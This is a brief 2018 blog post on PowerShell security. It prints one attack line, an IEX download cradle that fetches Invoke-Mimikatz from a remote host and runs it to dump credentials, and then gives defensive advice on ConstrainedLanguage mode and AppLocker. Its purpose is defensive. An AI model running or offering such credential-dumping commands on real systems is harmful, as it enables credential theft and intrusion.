PowerShell Offensive & Defensive View

February 12, 2018

no comments

Hi

As we know PowerShell can be much more than a scripting platform, when it comes to administrative rights.

Running unsigned process and scripts will serve the attacker to advance another step in to achieve the objective.

Mimikatz and other painful tools detected by Antiviruses and Antimalware spot, but when they bypass , we are expose to one of the suspicious attacks in PowerShell today.

 

Using IEX cradle to get new file –  is one of them,

Simply upload the PS script and run the following:

 

“IEX (New-Object Net.WebClient).DownloadString(‘https://192.168.1.1/Invoke-Mimikatz.ps1’);Invoke-Mimikatz -DumpCreds”

 

 

PowerShell can limit access to above command by using Language Mode

 

FullLanguage – permits all language elements in the session:

$ExecutionContext.SessionState.LanguageMode=1

 

ConstrainedLanguage – permits all Windows cmdlets and all PowerShell language elements, but it limits permitted types: Direct .Net Scripting, Win32 API via Add-Type, Interaction with COM Objects.

$ExecutionContext.SessionState.LanguageMode=3

 

It’s High Recommended to hardening the above with AppLocker Control Policy Via GPO to prevent from Local Administrators any changes.

 

___________________________________________________________________________________________________

 

Add comment
facebook linkedin twitter email

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*